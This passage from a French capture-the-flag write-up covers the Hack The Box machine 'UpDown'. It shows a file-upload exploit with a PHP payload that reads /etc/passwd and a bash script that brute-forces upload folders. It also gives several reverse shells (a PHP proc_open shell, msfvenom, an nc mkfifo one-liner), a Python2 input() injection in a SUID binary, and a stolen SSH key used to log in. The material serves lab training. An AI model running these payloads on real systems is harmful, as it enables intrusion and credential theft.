</span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST / HTTP/1.1 </span></span><span class="line"><span class="cl">Host: dev.siteisup.htb </span></span><span class="line"><span class="cl">Special-Dev: only4dev </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:144.0<span class="o">)</span> Gecko/20100101 Firefox/144.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: multipart/form-data<span class="p">;</span> <span class="nv">boundary</span><span class="o">=</span>----geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 </span></span><span class="line"><span class="cl">Content-Length: <span class="m">652</span> </span></span><span class="line"><span class="cl">Origin: http://dev.siteisup.htb </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://dev.siteisup.htb </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;file&#34;</span><span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;shell.phar&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: application/x-php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://siteisup.com </span></span><span class="line"><span class="cl">http://10.10.10.10 </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://siteisup.com </span></span><span class="line"><span class="cl">http://10.10.10.10 </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://siteisup.com </span></span><span class="line"><span class="cl">http://10.10.10.10 </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"><span class="nb">echo</span> file_get_contents<span class="o">(</span> <span class="s2">&#34;/etc/passwd&#34;</span> <span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">?&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;check&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Check </span></span><span class="line"><span class="cl">------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8-- </span></span></code></pre></td></tr></table> </div> </div><p>Le code source de <strong>checker.php</strong> récupérer dans le <strong>.git</strong>, nous montre que les fichiers sont uploader dans un dossier du nom de:</p> <blockquote> <p>md5(time())</p> </blockquote> <p>On a donc créer le code bash suivant, afin de retrouver rapidement le fichier shell.phar : <code>md5.sh</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">timestamp</span><span class="o">=</span><span class="k">$(</span>date +%s<span class="k">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> i in <span class="o">{</span>1..10<span class="o">}</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nv">t</span><span class="o">=</span><span class="k">$((</span><span class="nv">$timestamp</span><span class="o">-</span><span class="nv">$i</span><span class="k">))</span> </span></span><span class="line"><span class="cl"> <span class="nv">md5</span><span class="o">=</span><span class="k">$(</span><span class="nb">echo</span> -n <span class="nv">$t</span> <span class="p">|</span> md5sum <span class="p">|</span> cut -d<span class="s1">&#39; &#39;</span> -f1<span class="k">)</span> </span></span><span class="line"><span class="cl"> <span class="c1">#echo $md5</span> </span></span><span class="line"><span class="cl"> <span class="nv">url</span><span class="o">=</span><span class="s1">&#39;http://dev.siteisup.htb/uploads/&#39;</span><span class="nv">$md5</span><span class="s1">&#39;/&#39;</span><span class="nv">$1</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;curl &#34;</span><span class="nv">$url</span><span class="s2">&#34; -H &#39;Special-Dev: only4dev&#39; -i&#34;</span> </span></span><span class="line"><span class="cl"> curl <span class="nv">$url</span> -H <span class="s1">&#39;Special-Dev: only4dev&#39;</span> -i </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ce code <strong>Bash</strong> génère 10 noms de dossiers possible pour les 10 dernières secondes écoulées, puis effectuer des requêtes curl avec ces 10 dossiers vers le fichier shell.phar.</p> <p>Lors de l&rsquo;execution de notre requpête Burp, il suffit ensuite d&rsquo;executer notre script Bash qui va retrouver notre fichier shell.phar et executer le code PHP présent. ATTENTION, dans la requete Burp, il faut rajouter beaucoup de :</p> <blockquote> <p><a class="link" href="http://google.com" target="_blank" rel="noopener" >http://google.com</a> <a class="link" href="http://google.com" target="_blank" rel="noopener" >http://google.com</a> &hellip;</p> </blockquote> <p>au début de la requête.</p> <p>En effet, le fichier <strong>shell.phar</strong> est créer uniquement le temps de vérification des URL par le checker.php. Plus on met d&rsquo;URL, plus le temps d&rsquo;execution est long et notre fichier n&rsquo;est pas supprimé.</p> <p>Dans un premier temps, on a afficher <strong>/etc/passwd</strong> :</p> <blockquote> <p>./md5.sh shell.phar</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">messagebus:x:103:106::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">syslog:x:104:110::/home/syslog:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_apt:x:105:65534::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false </span></span><span class="line"><span class="cl">uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sshd:x:109:65534::/run/sshd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin </span></span><span class="line"><span class="cl">pollinate:x:111:1::/var/cache/pollinate:/bin/false </span></span><span class="line"><span class="cl">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false </span></span><span class="line"><span class="cl">developer:x:1002:1002::/home/developer:/bin/bash </span></span></code></pre></td></tr></table> </div> </div><h3 id="reverse-shell---proc_open">Reverse Shell - proc_open </h3><p>En regardant la sortie de phpinfo(), on découvre qu&rsquo;une liste de fonctions est bloqué:</p> <ul> <li>system, shell_exec, exec&hellip;</li> </ul> <p>Les fonctions utilisées habituellement pour executer des commandes et obtenir un reverse shell ne fonctionnent pas.</p> <p>Cependant, après quelques recherches on trouve le fonction <strong>proc_open</strong> qui n&rsquo;est pas bloqué et permet d&rsquo;executer du code :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"><span class="nv">$descriptorspec</span> <span class="o">=</span> array<span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="nv">0</span> <span class="o">=</span>&gt; array<span class="o">(</span><span class="s2">&#34;pipe&#34;</span>, <span class="s2">&#34;r&#34;</span><span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="nv">1</span> <span class="o">=</span>&gt; array<span class="o">(</span><span class="s2">&#34;pipe&#34;</span>, <span class="s2">&#34;w&#34;</span><span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="nv">2</span> <span class="o">=</span>&gt; array<span class="o">(</span><span class="s2">&#34;pipe&#34;</span>, <span class="s2">&#34;w&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="s2">&#34;bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.14.14/4444 0&gt;&amp;1&#39;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$process</span> <span class="o">=</span> proc_open<span class="o">(</span><span class="nv">$cmd</span>, <span class="nv">$descriptorspec</span>, <span class="nv">$pipes</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">(</span>is_resource<span class="o">(</span><span class="nv">$process</span><span class="o">))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> fclose<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>0<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> stream_get_contents<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>1<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> fclose<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>1<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> stream_get_contents<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>2<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> fclose<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>2<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> proc_close<span class="o">(</span><span class="nv">$process</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">?&gt; </span></span></code></pre></td></tr></table> </div> </div><p>La meilleure technique aurait été de directement généré un reverse shell php à l&rsquo;aide de <strong>msfvenom</strong>. Ce code php teste 1 par 1 toutes les fonctions permettant l&rsquo;execution de commandes systèmes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p php/reverse_php <span class="nv">LHOST</span><span class="o">=</span>10.10.14.14 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f raw &gt; shell.php </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant ce code, on obient directement un reverse shell à l&rsquo;aide de <strong>proc_open</strong>. Le problème avec cette méthode est qu&rsquo;on ne sait pas forcement quelle fonction à permis d&rsquo;obtenir le reverse shell.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177:49708. </span></span><span class="line"><span class="cl">socket_create </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">www-data </span></span><span class="line"><span class="cl">rm /tmp/f<span class="p">;</span>mkfifo /tmp/f<span class="p">;</span>cat /tmp/f<span class="p">|</span>bash -i 2&gt;<span class="p">&amp;</span>1<span class="p">|</span>nc 10.10.14.14 <span class="m">1338</span> &gt;/tmp/f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------- </span></span><span class="line"><span class="cl"><span class="c1"># Better shell</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1338 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1338 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177:35496. </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ python -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">&lt;ab47bcda3749f056619b17b959cdd659$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">13292</span> suspended nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>exegol-pentest<span class="o">]</span> downloads <span class="c1"># stty raw -echo;fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">13292</span> continued nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---developer">www-data -&gt; developer </h2><h3 id="suid-binary---python-injection">SUID binary - Python Injection </h3><p>On trouve un binaire <strong>siteiup</strong>. En l&rsquo;executant, on se rend compte qu&rsquo;il interprete directement le code de &ldquo;siteisup_test.py&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@updown:/home/developer$ ls </span></span><span class="line"><span class="cl">dev user.txt </span></span><span class="line"><span class="cl">www-data@updown:/home/developer$ <span class="nb">cd</span> dev </span></span><span class="line"><span class="cl">www-data@updown:/home/developer/dev$ ls -lah </span></span><span class="line"><span class="cl">total 32K </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">2</span> developer www-data 4.0K Jun <span class="m">22</span> <span class="m">2022</span> . </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">6</span> developer developer 4.0K Aug <span class="m">30</span> <span class="m">2022</span> .. </span></span><span class="line"><span class="cl">-rwsr-x--- <span class="m">1</span> developer www-data 17K Jun <span class="m">22</span> <span class="m">2022</span> siteisup </span></span><span class="line"><span class="cl">-rwxr-x--- <span class="m">1</span> developer www-data <span class="m">154</span> Jun <span class="m">22</span> <span class="m">2022</span> siteisup_test.py </span></span></code></pre></td></tr></table> </div> </div><p>Dans ce code Python, on observe l&rsquo;utilisation de la fonction &ldquo;input&rdquo;. De plus, le code est executé avec Python2 et non pas Python3. Sous Python2, lors de l&rsquo;utilisation de la fonction &ldquo;input&rdquo; Python ne considère pas par défaut qu&rsquo;il s&rsquo;agit d&rsquo;une String, et tente donc de le parser. On peut donc injecter du code python pour ouvrir un reverse shell. Sous Python3, la sortie de input(&quot;&quot;) est une Str par défaut donc pas d&rsquo;injection possible :</p> <p>Payload:</p> <blockquote> <p><strong>import</strong>(&lsquo;os&rsquo;).system(&lsquo;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2&gt;&amp;1|nc 10.10.14.14 8888 &gt;/tmp/b&rsquo;)</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">url</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&#34;Enter URL here:&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">page</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">page</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span> <span class="s2">&#34;Website is up&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span> <span class="s2">&#34;Website is down&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">-------------------------</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">www</span><span class="o">-</span><span class="n">data</span><span class="nd">@updown</span><span class="p">:</span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">developer</span><span class="o">/</span><span class="n">dev</span><span class="err">$</span> <span class="o">./</span><span class="n">siteisup</span> </span></span><span class="line"><span class="cl"><span class="n">Welcome</span> <span class="n">to</span> <span class="s1">&#39;siteisup.htb&#39;</span> <span class="n">application</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">Enter</span> <span class="n">URL</span> <span class="n">here</span><span class="p">:</span><span class="nb">__import__</span><span class="p">(</span><span class="s1">&#39;os&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">&#39;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2&gt;&amp;1|nc 10.10.14.14 8888 &gt;/tmp/b&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rm</span><span class="p">:</span> <span class="n">cannot</span> <span class="n">remove</span> <span class="s1">&#39;/tmp/b&#39;</span><span class="p">:</span> <span class="n">No</span> <span class="n">such</span> <span class="n">file</span> <span class="ow">or</span> <span class="n">directory</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un nouveau reverse shell en tant que &lsquo;developer&rsquo;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">8888</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::8888 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:8888 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177:45492. </span></span><span class="line"><span class="cl">developer@updown:/home/developer/dev$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">developer </span></span><span class="line"><span class="cl">developer@updown:/home/developer/dev$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl">developer@updown:/home/developer$ ls -l .ssh </span></span><span class="line"><span class="cl">ls -l .ssh </span></span><span class="line"><span class="cl">total <span class="m">12</span> </span></span><span class="line"><span class="cl">-rw-rw-r-- <span class="m">1</span> developer developer <span class="m">572</span> Aug <span class="m">2</span> <span class="m">2022</span> authorized_keys </span></span><span class="line"><span class="cl">-rw------- <span class="m">1</span> developer developer <span class="m">2602</span> Aug <span class="m">2</span> <span class="m">2022</span> id_rsa </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> developer developer <span class="m">572</span> Aug <span class="m">2</span> <span class="m">2022</span> id_rsa.pub </span></span><span class="line"><span class="cl">developer@updown:/home/developer$ cat .ssh/id_rsa </span></span><span class="line"><span class="cl">cat .ssh/id_rsa </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn </span></span><span class="line"><span class="cl">........ </span></span><span class="line"><span class="cl">3zga8EzubgwnpU7r9hN2jWboCCIOeDtvXFv08KT8pFDCCA+sMa5uoWQlBqmsOWCLvtaOWe </span></span><span class="line"><span class="cl">N4jA+ppn1+3e0AAAASZGV2ZWxvcGVyQHNpdGVpc3VwAQ<span class="o">==</span> </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span></code></pre></td></tr></table> </div> </div><p>On trouve la clé SSH de <strong>developer</strong> nous permettant de nous connecter facilement via ce protocole :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ vim developer.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> developer.key </span></span><span class="line"><span class="cl">$ ssh developer@10.10.11.177 -i developer.key </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04.5 LTS <span class="o">(</span>GNU/Linux 5.4.0-122-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">Last login: Tue Aug <span class="m">30</span> 11:24:44 <span class="m">2022</span> from 10.10.14.36 </span></span><span class="line"><span class="cl">developer@updown:~$ cat user.txt </span></span><span 